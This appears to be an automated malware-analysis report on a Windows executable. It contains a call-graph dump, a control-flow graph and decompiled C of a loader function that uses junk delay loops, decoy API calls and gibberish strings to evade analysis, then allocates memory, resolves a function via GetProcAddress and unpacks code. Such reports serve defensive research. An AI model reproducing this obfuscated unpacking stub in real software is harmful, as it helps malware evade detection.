13367 407736 13347->13367 13350 407f5d 13348->13350 13371 408d23 13348->13371 13350->13339 13376 4074df 13352->13376 13355 4097ee std::_Mutex::_Mutex 73 API calls 13356 407523 13355->13356 13358 40752f 13356->13358 13379 40447c 13356->13379 13359 40759f 13358->13359 13360 4075a9 __EH_prolog 13359->13360 13448 4045b4 13360->13448 13366 4075cd 13366->13347 13368 407742 13367->13368 13369 407755 13367->13369 13592 407539 13368->13592 13369->13348 13372 40890d std::_Lockit::_Lockit EnterCriticalSection 13371->13372 13373 408d33 13372->13373 13374 408935 __Fac_tidy LeaveCriticalSection 13373->13374 13375 408d73 13374->13375 13375->13350 13384 4073cc 13376->13384 13390 408bbb 13379->13390 13381 404484 std::locale::locale 13406 4043f5 13381->13406 13385 4073d6 __EH_prolog 13384->13385 13386 407473 13385->13386 13387 409853 __CxxThrowException@8 RaiseException 13385->13387 13388 4070b4 73 API calls numpunct 13385->13388 13389 40706f 73 API calls std::bad_exception::bad_exception 13385->13389 13386->13355 13387->13385 13388->13385 13389->13385 13391 408bc7 __EH_prolog3 13390->13391 13392 408c4d std::locale::_Init 13391->13392 13411 40890d 13391->13411 13392->13381 13395 408c37 13423 408935 13395->13423 13397 4097ee std::_Mutex::_Mutex 73 API calls 13398 408bf0 13397->13398 13399 408c04 13398->13399 13415 408b14 13398->13415 13419 4089ef 13399->13419 13403 406ecd std::_Locinfo::_Locinfo_ctor 73 API calls 13404 408c2a 13403->13404 13405 4043f5 std::locale::facet::_Incref 2 API calls 13404->13405 13405->13395 13407 40890d std::_Lockit::_Lockit EnterCriticalSection 13406->13407 13408 404406 13407->13408 13409 408935 __Fac_tidy LeaveCriticalSection 13408->13409 13410 40441a 13409->13410 13410->13358 13412 40892d 13411->13412 13413 40891f 13411->13413 13412->13395 13412->13397 13427 409065 EnterCriticalSection 13413->13427 13416 408b20 __EH_prolog3 13415->13416 13417 4070b4 numpunct 73 API calls 13416->13417 13418 408b53 std::locale::_Init 13417->13418 13418->13399 13420 4089fd 13419->13420 13421 408a0e 13419->13421 13428 409085 13420->13428 13421->13403 13424 40894a 13423->13424 13425 40893c 13423->13425 13424->13392 13447 409075 LeaveCriticalSection 13425->13447 13427->13412 13429 409099 13428->13429 13430 409093 13428->13430 13429->13421 13431 4101f9 __NMSG_WRITE 65 API calls 13430->13431 13433 409da2 13430->13433 13431->13433 13432 41003c _abort 5 API calls 13434 409da8 13432->13434 13433->13432 13435 409db3 _memset 13434->13435 13436 410049 _raise 65 API calls 13434->13436 13437 409e8b 13435->13437 13440 409e4b SetUnhandledExceptionFilter UnhandledExceptionFilter 13435->13440 13436->13435 13438 40ff65 _abort 65 API calls 13437->13438 13439 409e92 MoveFileA 13438->13439 13442 409eb0 13439->13442 13443 409ea8 GetLastError 13439->13443 13440->13437 13444 409ec2 13442->13444 13445 40b14e __dosmaperr 65 API calls 13442->13445 13443->13442 13444->13421 13446 409ebc 13445->13446 13446->13421 13447->13424 13473 404496 13448->13473 13451 4071ca 13452 4071d4 __EH_prolog 13451->13452 13453 40890d std::_Lockit::_Lockit EnterCriticalSection 13452->13453 13454 4071e3 13453->13454 13476 4043c0 13454->13476 13456 40720d 13458 408935 __Fac_tidy LeaveCriticalSection 13456->13458 13457 4071fa 13457->13456 13482 406fc6 13457->13482 13459 407262 13458->13459 13469 4044af 13459->13469 13462 40723f 13464 4043f5 std::locale::facet::_Incref 2 API calls 13462->13464 13466 40724f 13464->13466 13499 404458 13466->13499 13467 409853 __CxxThrowException@8 RaiseException 13467->13462 13470 4044b5 13469->13470 13471 4044ba 13469->13471 13587 40441d 13470->13587 13471->13366 13474 4043f5 std::locale::facet::_Incref 2 API calls 13473->13474 13475 4044a8 13474->13475 13475->13451 13477 4043f0 13476->13477 13478 4043cc 13476->13478 13477->13457 13479 40890d std::_Lockit::_Lockit EnterCriticalSection 13478->13479 13480 4043d6 13479->13480 13481 408935 __Fac_tidy LeaveCriticalSection 13480->13481 13481->13477 13484 406fd0 __EH_prolog 13482->13484 13483 40705f 13483->13462 13496 4091d1 13483->13496 13484->13483 13485 4097ee std::_Mutex::_Mutex 73 API calls 13484->13485 13486 406fee 13485->13486 13487 40702f 13486->13487 13502 406fa9 13486->13502 13490 407051 13487->13490 13523 406ccc 13487->13523 13490->13483 13537 406945 13490->13537 13497 4090e1 std::exception::exception 65 API calls 13496->13497 13498 407231 13497->13498 13498->13467 13561 408aae 13499->13561 13503 406ea9 std::bad_exception::bad_exception 73 API calls 13502->13503 13504 406fbf 13503->13504 13505 406c70 13504->13505 13506 406c7a __EH_prolog 13505->13506 13507 40890d std::_Lockit::_Lockit EnterCriticalSection 13506->13507 13508 406c88 13507->13508 13540 406924 13508->13540 13511 406924 65 API calls 13512 406c9c 13511->13512 13513 406924 65 API calls 13512->13513 13514 406ca4 13513->13514 13515 406924 65 API calls 13514->13515 13516 406cac 13515->13516 13544 408c55 13516->13544 13519 40546f 13520 40547d std::bad_exception::bad_exception 13519->13520 13554 40456e 13520->13554 13524 406cd6 __EH_prolog 13523->13524 13557 408aec 13524->13557 13527 406945 Mailbox 65 API calls 13528 406cf3 13527->13528 13529 406945 Mailbox 65 API calls 13528->13529 13530 406cfb 13529->13530 13531 406945 Mailbox 65 API calls 13530->13531 13532 406d03 13531->13532 13533 406945 Mailbox 65 API calls 13532->13533 13534 406d0b 13533->13534 13535 408935 __Fac_tidy LeaveCriticalSection 13534->13535 13536 406d16 13535->13536 13536->13490 13538 4064eb std::locale::_Locimp::~_Locimp 65 API calls 13537->13538 13539 40694e 13538->13539 13539->13483 13541 40692f numpunct 13540->13541 13542 4064eb std::locale::_Locimp::~_Locimp 65 API calls 13541->13542 13543 406941 13542->13543 13543->13511 13545 408c65 13544->13545 13546 40c2c8 _setlocale 116 API calls 13545->13546 13547 408c76 13546->13547 13548 406ecd std::_Locinfo::_Locinfo_ctor 73 API calls 13547->13548 13549 408c8d 13548->13549 13550 408c99 13549->13550 13551 40c2c8 _setlocale 116 API calls 13549->13551 13552 406ecd std::_Locinfo::_Locinfo_ctor 73 API calls 13550->13552 13551->13550 13553 406cb9 13552->13553 13553->13519 13555 404387 std::_Locinfo::_Getctype 73 API calls 13554->13555 13556 404584 13555->13556 13556->13487 13558 406cea 13557->13558 13559 408afa 13557->13559 13558->13527 13560 40c2c8 _setlocale 116 API calls 13559->13560 13560->13558 13562 408abc 13561->13562 13566 408ac6 13561->13566 13567 40894c 13562->13567 13563 4097ee std::_Mutex::_Mutex 73 API calls 13565 40445e 13563->13565 13565->13456 13566->13563 13568 40b298 _AtModuleExit 72 API calls 13567->13568 13571 408959 13568->13571 13569 408964 13569->13566 13570 409da2 13573 41003c _abort 5 API calls 13570->13573 13571->13569 13571->13570 13572 4101f9 __NMSG_WRITE 65 API calls 13571->13572 13572->13570 13574 409da8 13573->13574 13575 410049 _raise 65 API calls 13574->13575 13578 409db3 _memset 13574->13578 13575->13578 13576 409e8b 13577 40ff65 _abort 65 API calls 13576->13577 13579 409e92 MoveFileA 13577->13579 13578->13576 13580 409e4b SetUnhandledExceptionFilter UnhandledExceptionFilter 13578->13580 13582 409eb0 13579->13582 13583 409ea8 GetLastError 13579->13583 13580->13576 13584 409ec2 13582->13584 13585 40b14e __dosmaperr 65 API calls 13582->13585 13583->13582 13584->13566 13586 409ebc 13585->13586 13586->13566 13588 40890d std::_Lockit::_Lockit EnterCriticalSection 13587->13588 13589 40442f 13588->13589 13590 408935 __Fac_tidy LeaveCriticalSection 13589->13590 13591 404452 13590->13591 13591->13471 13593 407545 13592->13593 13594 4073cc 73 API calls 13593->13594 13595 407551 13594->13595 13595->13369 13597 405ceb __EH_prolog 13596->13597 13610 408db1 13597->13610 13600 4097ee std::_Mutex::_Mutex 73 API calls 13601 405d0b 13600->13601 13602 40447c std::locale::locale 79 API calls 13601->13602 13603 405d17 13601->13603 13602->13603 13603->13332 13605 4065e1 13604->13605 13609 4065ff Mailbox 13604->13609 13606 405c9c std::_Locinfo::_Locinfo_ctor 73 API calls 13605->13606 13605->13609 13607 4065f2 13606->13607 13608 405d6e std::locale::_Locimp::~_Locimp 65 API calls 13607->13608 13608->13609 13609->13334 13611 4097ee std::_Mutex::_Mutex 73 API calls 13610->13611 13612 408dbd 13611->13612 13615 409045 InitializeCriticalSection 13612->13615 13614 405d00 13614->13600 13615->13614 13617 407fb8 __EH_prolog 13616->13617 13644 40525c 13617->13644 13619 407ffa 13619->13030 13620 407fca 13620->13619 13648 407f69 13620->13648 13623 4075f0 __EH_prolog 13622->13623 13624 40890d std::_Lockit::_Lockit EnterCriticalSection 13623->13624 13625 4075ff 13624->13625 13626 4043c0 int 2 API calls 13625->13626 13627 407616 13626->13627 13628 407629 13627->13628 13657 407272 13627->13657 13629 408935 __Fac_tidy LeaveCriticalSection 13628->13629 13631 40767e 13629->13631 13631->13039 13633 40765b 13635 4043f5 std::locale::facet::_Incref 2 API calls 13633->13635 13634 4091d1 std::bad_exception::bad_exception 65 API calls 13636 40764d 13634->13636 13637 40766b 13635->13637 13638 409853 __CxxThrowException@8 RaiseException 13636->13638 13639 404458 77 API calls 13637->13639 13638->13633 13639->13628 13641 40857c __EH_prolog 13640->13641 13642 408597 13641->13642 13696 408452 13641->13696 13642->13038 13646 405277 13644->13646 13645 405289 13645->13620 13646->13645 13652 405228 13646->13652 13649 407f7f 13648->13649 13650 407736 73 API calls 13649->13650 13651 407fa8 13650->13651 13651->13619 13653 408de2 13652->13653 13656 409065 EnterCriticalSection 13653->13656 13655 408de9 13655->13645 13656->13655 13659 40727c __EH_prolog 13657->13659 13658 407309 13658->13633 13658->13634 13659->13658 13660 4097ee std::_Mutex::_Mutex 73 API calls 13659->13660 13661 40729a 13660->13661 13662 406fa9 73 API calls 13661->13662 13670 4072db 13661->13670 13663 4072b2 13662->13663 13665 406c70 125 API calls 13663->13665 13664 4072fb 13664->13658 13668 406945 Mailbox 65 API calls 13664->13668 13667 4072c9 13665->13667 13666 406ccc 117 API calls 13666->13664 13671 405db6 13667->13671 13668->13658 13670->13664 13670->13666 13672 405dc4 std::bad_exception::bad_exception 13671->13672 13675 40540c 13672->13675 13678 4043aa 13675->13678 13681 40889d 13678->13681 13686 40ac24 13681->13686 13687 40dabc __getptd 65 API calls 13686->13687 13689 40ac29 13687->13689 13688 4088a5 13691 40abfe 13688->13691 13689->13688 13690 40b69c _LocaleUpdate::_LocaleUpdate 73 API calls 13689->13690 13690->13688 13692 40dabc __getptd 65 API calls 13691->13692 13693 40ac03 13692->13693 13694 4043b2 13693->13694 13695 40b69c _LocaleUpdate::_LocaleUpdate 73 API calls 13693->13695 13694->13670 13695->13694 13697 40845c __EH_prolog 13696->13697 13698 408480 13697->13698 13699 407f69 73 API calls 13697->13699 13698->13642 13699->13698 13701 40d870 __decode_pointer 5 API calls 13700->13701 13702 409da8 13701->13702 13702->13050 13703 410049 13702->13703 13709 410055 ___BuildCatchObject 13703->13709 13704 4100b1 13706 410092 13704->13706 13708 4100c0 13704->13708 13705 41007c 13707 40da43 __getptd_noexit 65 API calls 13705->13707 13710 40d870 __decode_pointer 5 API calls 13706->13710 13713 410081 _siglookup 13707->13713 13711 40b128 __cftof_l 65 API calls 13708->13711 13709->13704 13709->13705 13709->13706 13712 410078 13709->13712 13710->13713 13714 4100c5 13711->13714 13712->13705 13712->13708 13716 410127 13713->13716 13717 40ff65 _abort 65 API calls 13713->13717 13723 41008a ___BuildCatchObject 13713->13723 13715 409a6f __cftof_l 5 API calls 13714->13715 13715->13723 13718 40dfcf __lock 65 API calls 13716->13718 13719 410132 13716->13719 13717->13716 13718->13719 13720 40d867 _doexit 6 API calls 13719->13720 13721 410167 13719->13721 13720->13721 13727 4101bd 13721->13727 13723->13050 13732 40fe23 13724->13732 13726 409e92 MoveFileA 13726->13054 13726->13055 13728 4101c3 13727->13728 13729 4101ca 13727->13729 13731 40def5 LeaveCriticalSection 13728->13731 13729->13723 13731->13729 13733 40fe2f ___BuildCatchObject 13732->13733 13734 40dfcf __lock 65 API calls 13733->13734 13735 40fe36 13734->13735 13737 40d870 __decode_pointer 5 API calls 13735->13737 13741 40feef __initterm 13735->13741 13739 40fe6d 13737->13739 13739->13741 13743 40d870 __decode_pointer 5 API calls 13739->13743 13740 40ff37 ___BuildCatchObject 13740->13726 13749 40ff3a 13741->13749 13748 40fe82 13743->13748 13744 40ff2e 13745 40fd33 _fast_error_exit 2 API calls 13744->13745 13745->13740 13746 40d867 6 API calls _doexit 13746->13748 13747 40d870 5 API calls __decode_pointer 13747->13748 13748->13741 13748->13746 13748->13747 13750 40ff40 13749->13750 13751 40ff1b 13749->13751 13754 40def5 LeaveCriticalSection 13750->13754 13751->13740 13753 40def5 LeaveCriticalSection 13751->13753 13753->13744 13754->13751

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 404ae9-404afa call 4093a0 3 404afc-404b02 0->3 4 404b11-404b17 3->4 5 404b04-404b0b SetLastError GetTickCount 3->5 6 404b19-404b20 4->6 7 404b2b-404b32 4->7 5->4 6->7 8 404b22-404b29 6->8 7->3 9 404b34 7->9 8->7 8->9 10 404b36-404b3c 9->10 11 404b49-404b50 10->11 12 404b3e-404b43 10->12 13 404b52-404b54 GetLogicalDriveStringsW 11->13 14 404b5a-404b61 11->14 12->11 13->14 14->10 15 404b63-404b7d LocalAlloc 14->15 16 404bc7-404bce 15->16 17 404b7f-404b8c call 40492d 15->17 18 404bd3-404bda 16->18 24 404bbe-404bc5 17->24 25 404b8e-404bb8 UnregisterWait GetNamedPipeHandleStateW InterlockedIncrement 17->25 20 404be0-404c84 GetConsoleAliasExesLengthW EnumCalendarInfoA EnumDateFormatsW InterlockedCompareExchange DeleteFiber GetPrivateProfileStructA LeaveCriticalSection InterlockedExchange RtlCaptureContext FindResourceA LocalFlags OpenMutexA GetStringTypeExA GetComputerNameA InitializeCriticalSection 18->20 21 404c8a-404c8b 18->21 20->21 21->18 23 404c91-404c94 21->23 26 404c99-404ca0 23->26 24->16 24->17 25->24 27 404ca2-404ca3 LoadLibraryW 26->27 28 404ca9-404cb0 26->28 27->28 29 404cb2-404cb9 GetModuleHandleA 28->29 30 404cbe-404cc8 28->30 29->30 30->26 31 404cca-404ce2 30->31 33 404ce4-404ce7 31->33 34 404ce9 call 4049ea 33->34 35 404cee-404cf5 33->35 34->35 35->33 36 404cf7-404d02 35->36 38 404d08 call 4048af 36->38 39 404d0d-404d13 38->39 40 404d16-404d1d 39->40 41 404d22-404d29 40->41 42 404d1f-404d20 InterlockedDecrement 40->42 43 404d30-404d3a 41->43 44 404d2b call 4049dc 41->44 42->41 43->40 46 404d3c call 404604 43->46 44->43 48 404d41-404d4b 46->48 49 404d51-404e5d GetCurrentConsoleFont GlobalFlags FindNextVolumeA GetConsoleFontSize CreateJobObjectA GetModuleHandleW FormatMessageW CreateActCtxA GetConsoleTitleA GetCalendarInfoA VerifyVersionInfoW FindFirstChangeNotificationA InterlockedIncrement InterlockedDecrement GetCommandLineA SearchPathA WriteConsoleOutputA GetProfileSectionA MoveFileWithProgressA GetCommandLineW 48->49 50 404e63-404e6b 48->50 49->50 51 404e71-404ef6 WriteConsoleA lstrcpynW CopyFileA LoadLibraryA MoveFileWithProgressW CreateIoCompletionPort GetOEMCP InterlockedExchange GetPrivateProfileStructA DeleteVolumeMountPointA GetConsoleAliasesLengthA GetFileTime GetStringTypeW 50->51 52 404efc-404f06 call 4049d6 50->52 51->52
                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E00404AE9(void* __ecx) {
                                                                                                                                    				void* _v6;
                                                                                                                                    				short _v8;
                                                                                                                                    				void* _v10;
                                                                                                                                    				long _v12;
                                                                                                                                    				long _v16;
                                                                                                                                    				struct _FILETIME _v24;
                                                                                                                                    				long _v28;
                                                                                                                                    				struct _FILETIME _v36;
                                                                                                                                    				struct _FILETIME _v44;
                                                                                                                                    				struct _CRITICAL_SECTION _v68;
                                                                                                                                    				intOrPtr _v72;
                                                                                                                                    				char _v76;
                                                                                                                                    				struct _CRITICAL_SECTION _v108;
                                                                                                                                    				struct _OSVERSIONINFOEXW _v392;
                                                                                                                                    				void _v1416;
                                                                                                                                    				char _v2440;
                                                                                                                                    				void _v3464;
                                                                                                                                    				short _v4488;
                                                                                                                                    				char _v5204;
                                                                                                                                    				char _v5512;
                                                                                                                                    				short _v7560;
                                                                                                                                    				void* _t57;
                                                                                                                                    				long _t80;
                                                                                                                                    				void* _t136;
                                                                                                                                    				void* _t138;
                                                                                                                                    				CHAR* _t139;
                                                                                                                                    				void* _t140;
                                                                                                                                    				int _t145;
                                                                                                                                    				void* _t146;
                                                                                                                                    				void* _t147;
                                                                                                                                    				long _t160;
                                                                                                                                    				void* _t162;
                                                                                                                                    
                                                                                                                                    				_t136 = __ecx;
                                                                                                                                    				E004093A0(0x1d84);
                                                                                                                                    				_t145 = 0;
                                                                                                                                    				L1:
                                                                                                                                    				L1:
                                                                                                                                    				if(_t145 < 0x214cd) {
                                                                                                                                    					SetLastError(0);
                                                                                                                                    					GetTickCount();
                                                                                                                                    				}
                                                                                                                                    				if(_t145 <= 0x1e9d5e41 || _v12 == 0xad5cf7 || _v72 == 0xad4c41c) {
                                                                                                                                    					goto L6;
                                                                                                                                    				}
                                                                                                                                    				L7:
                                                                                                                                    				_t146 = 0;
                                                                                                                                    				do {
                                                                                                                                    					if(_t146 == 0x420) {
                                                                                                                                    						 *0x60e9b0 =  *0x60e9b0 + 0x38d6;
                                                                                                                                    					}
                                                                                                                                    					if( *0x60e9b0 == 0x7a) {
                                                                                                                                    						GetLogicalDriveStringsW(0, 0);
                                                                                                                                    					}
                                                                                                                                    					_t146 = _t146 + 1;
                                                                                                                                    				} while (_t146 < 0x40dece);
                                                                                                                                    				_t57 = LocalAlloc(0,  *0x60e9b0); // executed
                                                                                                                                    				_t147 = 0;
                                                                                                                                    				 *0x60932c = _t57;
                                                                                                                                    				_t160 =  *0x60e9b0; // 0x91050
                                                                                                                                    				if(_t160 > 0) {
                                                                                                                                    					do {
                                                                                                                                    						E0040492D(_t147);
                                                                                                                                    						if( *0x60e9b0 == 0x1f) {
                                                                                                                                    							__imp__UnregisterWait(0);
                                                                                                                                    							GetNamedPipeHandleStateW(0,  &(_v24.dwHighDateTime),  &(_v36.dwHighDateTime),  &_v8,  &_v12,  &_v4488, 0);
                                                                                                                                    							InterlockedIncrement( &_v16);
                                                                                                                                    						}
                                                                                                                                    						_t147 = _t147 + 1;
                                                                                                                                    						_t162 = _t147 -  *0x60e9b0; // 0x91050
                                                                                                                                    					} while (_t162 < 0);
                                                                                                                                    				}
                                                                                                                                    				_t138 = 0x5aedbe7;
                                                                                                                                    				do {
                                                                                                                                    					if( *0x60e9b0 == 0x37) {
                                                                                                                                    						__imp__GetConsoleAliasExesLengthW();
                                                                                                                                    						EnumCalendarInfoA(0, 0, 0, 0);
                                                                                                                                    						EnumDateFormatsW(0, 0, 0);
                                                                                                                                    						InterlockedCompareExchange( &_v16, 0, 0);
                                                                                                                                    						DeleteFiber(0);
                                                                                                                                    						GetPrivateProfileStructA("visatajojiborurexidegolacimexici", "zofevejubolipidefenidel",  &_v1416, 0, "yevusirovom");
                                                                                                                                    						LeaveCriticalSection( &_v108);
                                                                                                                                    						InterlockedExchange(0, 0);
                                                                                                                                    						__imp__RtlCaptureContext( &_v5204);
                                                                                                                                    						FindResourceA(0, 0, 0);
                                                                                                                                    						LocalFlags(0);
                                                                                                                                    						OpenMutexA(0, 0, 0);
                                                                                                                                    						GetStringTypeExA(0, 0, "furaguk", 0,  &_v8);
                                                                                                                                    						GetComputerNameA( &_v2440,  &(_v24.dwHighDateTime));
                                                                                                                                    						InitializeCriticalSection( &_v68);
                                                                                                                                    					}
                                                                                                                                    					_t138 = _t138 - 1;
                                                                                                                                    				} while (_t138 != 0);
                                                                                                                                    				_v8 = 0;
                                                                                                                                    				_t139 = "msimg32.dll";
                                                                                                                                    				do {
                                                                                                                                    					if( *0x60e9b0 == 0x2e) {
                                                                                                                                    						LoadLibraryW(0);
                                                                                                                                    					}
                                                                                                                                    					if(_v8 == 0x76069) {
                                                                                                                                    						 *0x60ce2c = GetModuleHandleA(_t139);
                                                                                                                                    					}
                                                                                                                                    					_v8 = _v8 + 1;
                                                                                                                                    				} while (_v8 < 0x1756bb);
                                                                                                                                    				"msimg32.dll" = 0;
                                                                                                                                    				"`ghvmsimg32.dll" = GetProcAddress( *0x60ce2c, _t139);
                                                                                                                                    				_t140 = 0;
                                                                                                                                    				do {
                                                                                                                                    					if(_t140 == 0x1c) {
                                                                                                                                    						E004049EA(_t136); // executed
                                                                                                                                    					}
                                                                                                                                    					_t140 = _t140 + 1;
                                                                                                                                    				} while (_t140 < 0x3debc7);
                                                                                                                                    				_t80 = E004048AF( *0x60932c,  *0x60e9b0, 0x421010);
                                                                                                                                    				_v8 = 0;
                                                                                                                                    				do {
                                                                                                                                    					if( *0x60e9b0 == 0x10) {
                                                                                                                                    						_t80 = InterlockedDecrement(0);
                                                                                                                                    					}
                                                                                                                                    					if(_v8 == 0x1e674) {
                                                                                                                                    						_t80 = E004049DC(_t80);
                                                                                                                                    					}
                                                                                                                                    					_v8 = _v8 + 1;
                                                                                                                                    				} while (_v8 < 0x3e4e2);
                                                                                                                                    				E00404604();
                                                                                                                                    				if( *0x60e9b0 == 0x1144) {
                                                                                                                                    					__imp__GetCurrentConsoleFont(0, 0, 0);
                                                                                                                                    					GlobalFlags(0);
                                                                                                                                    					__imp__FindNextVolumeA(0, 0, 0);
                                                                                                                                    					__imp__GetConsoleFontSize(0, 0);
                                                                                                                                    					__imp__CreateJobObjectA(0, "xolat");
                                                                                                                                    					GetModuleHandleW(L"mazez");
                                                                                                                                    					FormatMessageW(0, 0, 0, 0,  &_v7560, 0, 0);
                                                                                                                                    					__imp__CreateActCtxA( &_v76);
                                                                                                                                    					GetConsoleTitleA( &_v2440, 0);
                                                                                                                                    					__imp__GetCalendarInfoA(0, 0, 0,  &_v1416, 0,  &_v16);
                                                                                                                                    					VerifyVersionInfoW( &_v392, 0, 0);
                                                                                                                                    					FindFirstChangeNotificationA(0, 0, 0);
                                                                                                                                    					InterlockedIncrement( &(_v24.dwHighDateTime));
                                                                                                                                    					InterlockedDecrement(0);
                                                                                                                                    					GetCommandLineA();
                                                                                                                                    					SearchPathA("pehifidukoviyawucukuhajumozuzepofuwi", "rinadivafinicihaz", "wozuvicepilubolumoyujiyopemetevosipijilatumejuwivola", 0,  &_v5512,  &(_v36.dwHighDateTime));
                                                                                                                                    					_v12 = 0;
                                                                                                                                    					asm("stosw");
                                                                                                                                    					_v8 = 0;
                                                                                                                                    					asm("stosw");
                                                                                                                                    					WriteConsoleOutputA(0,  &_v28, _v12, _v8,  &_v44);
                                                                                                                                    					GetProfileSectionA("Lucopeju jif",  &_v3464, 0);
                                                                                                                                    					__imp__MoveFileWithProgressA(0, 0, 0, 0, 0, 0);
                                                                                                                                    					GetCommandLineW();
                                                                                                                                    				}
                                                                                                                                    				if( *0x60e9b0 == 0x1d) {
                                                                                                                                    					WriteConsoleA(0, 0, 0,  &_v28, 0);
                                                                                                                                    					lstrcpynW( &_v7560, 0, 0);
                                                                                                                                    					CopyFileA(0, 0, 0);
                                                                                                                                    					LoadLibraryA(0);
                                                                                                                                    					__imp__MoveFileWithProgressW(0, 0, 0, 0, 0);
                                                                                                                                    					CreateIoCompletionPort(0, 0, 0, 0);
                                                                                                                                    					GetOEMCP();
                                                                                                                                    					InterlockedExchange( &_v16, 0);
                                                                                                                                    					GetPrivateProfileStructA(0, 0,  &_v3464, 0, 0);
                                                                                                                                    					__imp__DeleteVolumeMountPointA(0);
                                                                                                                                    					__imp__GetConsoleAliasesLengthA(0);
                                                                                                                                    					GetFileTime(0,  &_v36,  &_v24,  &_v44);
                                                                                                                                    					GetStringTypeW(0, 0, 0, 0);
                                                                                                                                    				}
                                                                                                                                    				L004049D6();
                                                                                                                                    				return 0;
                                                                                                                                    				L6:
                                                                                                                                    				_t145 = _t145 + 1;
                                                                                                                                    				if(_t145 < 0x91be26a3) {
                                                                                                                                    					goto L1;
                                                                                                                                    				}
                                                                                                                                    				goto L7;
                                                                                                                                    			}



































                                                                                                                                    0x00404ae9
                                                                                                                                    0x00404af1
                                                                                                                                    0x00404afa
                                                                                                                                    0x00000000
                                                                                                                                    0x00404afc
                                                                                                                                    0x00404b02
                                                                                                                                    0x00404b05
                                                                                                                                    0x00404b0b
                                                                                                                                    0x00404b0b
                                                                                                                                    0x00404b17
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00404b34
                                                                                                                                    0x00404b34
                                                                                                                                    0x00404b36
                                                                                                                                    0x00404b3c
                                                                                                                                    0x00404b43
                                                                                                                                    0x00404b43
                                                                                                                                    0x00404b50
                                                                                                                                    0x00404b54
                                                                                                                                    0x00404b54
                                                                                                                                    0x00404b5a
                                                                                                                                    0x00404b5b
                                                                                                                                    0x00404b6a
                                                                                                                                    0x00404b70
                                                                                                                                    0x00404b72
                                                                                                                                    0x00404b77
                                                                                                                                    0x00404b7d
                                                                                                                                    0x00404b7f
                                                                                                                                    0x00404b80
                                                                                                                                    0x00404b8c
                                                                                                                                    0x00404b8f
                                                                                                                                    0x00404bae
                                                                                                                                    0x00404bb8
                                                                                                                                    0x00404bb8
                                                                                                                                    0x00404bbe
                                                                                                                                    0x00404bbf
                                                                                                                                    0x00404bbf
                                                                                                                                    0x00404b7f
                                                                                                                                    0x00404bce
                                                                                                                                    0x00404bd3
                                                                                                                                    0x00404bda
                                                                                                                                    0x00404be0
                                                                                                                                    0x00404bea
                                                                                                                                    0x00404bf3
                                                                                                                                    0x00404bff
                                                                                                                                    0x00404c06
                                                                                                                                    0x00404c23
                                                                                                                                    0x00404c29
                                                                                                                                    0x00404c31
                                                                                                                                    0x00404c3e
                                                                                                                                    0x00404c47
                                                                                                                                    0x00404c4e
                                                                                                                                    0x00404c57
                                                                                                                                    0x00404c69
                                                                                                                                    0x00404c7a
                                                                                                                                    0x00404c84
                                                                                                                                    0x00404c84
                                                                                                                                    0x00404c8a
                                                                                                                                    0x00404c8a
                                                                                                                                    0x00404c91
                                                                                                                                    0x00404c94
                                                                                                                                    0x00404c99
                                                                                                                                    0x00404ca0
                                                                                                                                    0x00404ca3
                                                                                                                                    0x00404ca3
                                                                                                                                    0x00404cb0
                                                                                                                                    0x00404cb9
                                                                                                                                    0x00404cb9
                                                                                                                                    0x00404cbe
                                                                                                                                    0x00404cc1
                                                                                                                                    0x00404cd1
                                                                                                                                    0x00404cdd
                                                                                                                                    0x00404ce2
                                                                                                                                    0x00404ce4
                                                                                                                                    0x00404ce7
                                                                                                                                    0x00404ce9
                                                                                                                                    0x00404ce9
                                                                                                                                    0x00404cee
                                                                                                                                    0x00404cef
                                                                                                                                    0x00404d08
                                                                                                                                    0x00404d13
                                                                                                                                    0x00404d16
                                                                                                                                    0x00404d1d
                                                                                                                                    0x00404d20
                                                                                                                                    0x00404d20
                                                                                                                                    0x00404d29
                                                                                                                                    0x00404d2b
                                                                                                                                    0x00404d2b
                                                                                                                                    0x00404d30
                                                                                                                                    0x00404d33
                                                                                                                                    0x00404d3c
                                                                                                                                    0x00404d4b
                                                                                                                                    0x00404d54
                                                                                                                                    0x00404d5b
                                                                                                                                    0x00404d64
                                                                                                                                    0x00404d6c
                                                                                                                                    0x00404d78
                                                                                                                                    0x00404d83
                                                                                                                                    0x00404d96
                                                                                                                                    0x00404da0
                                                                                                                                    0x00404dae
                                                                                                                                    0x00404dc3
                                                                                                                                    0x00404dd3
                                                                                                                                    0x00404ddc
                                                                                                                                    0x00404de6
                                                                                                                                    0x00404ded
                                                                                                                                    0x00404def
                                                                                                                                    0x00404e10
                                                                                                                                    0x00404e18
                                                                                                                                    0x00404e1f
                                                                                                                                    0x00404e21
                                                                                                                                    0x00404e28
                                                                                                                                    0x00404e39
                                                                                                                                    0x00404e4c
                                                                                                                                    0x00404e57
                                                                                                                                    0x00404e5d
                                                                                                                                    0x00404e5d
                                                                                                                                    0x00404e6b
                                                                                                                                    0x00404e79
                                                                                                                                    0x00404e88
                                                                                                                                    0x00404e91
                                                                                                                                    0x00404e98
                                                                                                                                    0x00404ea3
                                                                                                                                    0x00404ead
                                                                                                                                    0x00404eb3
                                                                                                                                    0x00404ebe
                                                                                                                                    0x00404ecf
                                                                                                                                    0x00404ed2
                                                                                                                                    0x00404ed9
                                                                                                                                    0x00404eec
                                                                                                                                    0x00404ef6
                                                                                                                                    0x00404ef6
                                                                                                                                    0x00404efc
                                                                                                                                    0x00404f06
                                                                                                                                    0x00404b2b
                                                                                                                                    0x00404b2b
                                                                                                                                    0x00404b32
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00404B05
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00404B0B
                                                                                                                                    • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00404B54
                                                                                                                                    • LocalAlloc.KERNELBASE(00000000), ref: 00404B6A
                                                                                                                                    • UnregisterWait.KERNEL32(00000000), ref: 00404B8F
                                                                                                                                    • GetNamedPipeHandleStateW.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00404BAE
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00404BB8
                                                                                                                                    • GetConsoleAliasExesLengthW.KERNEL32 ref: 00404BE0
                                                                                                                                    • EnumCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404BEA
                                                                                                                                    • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00404BF3
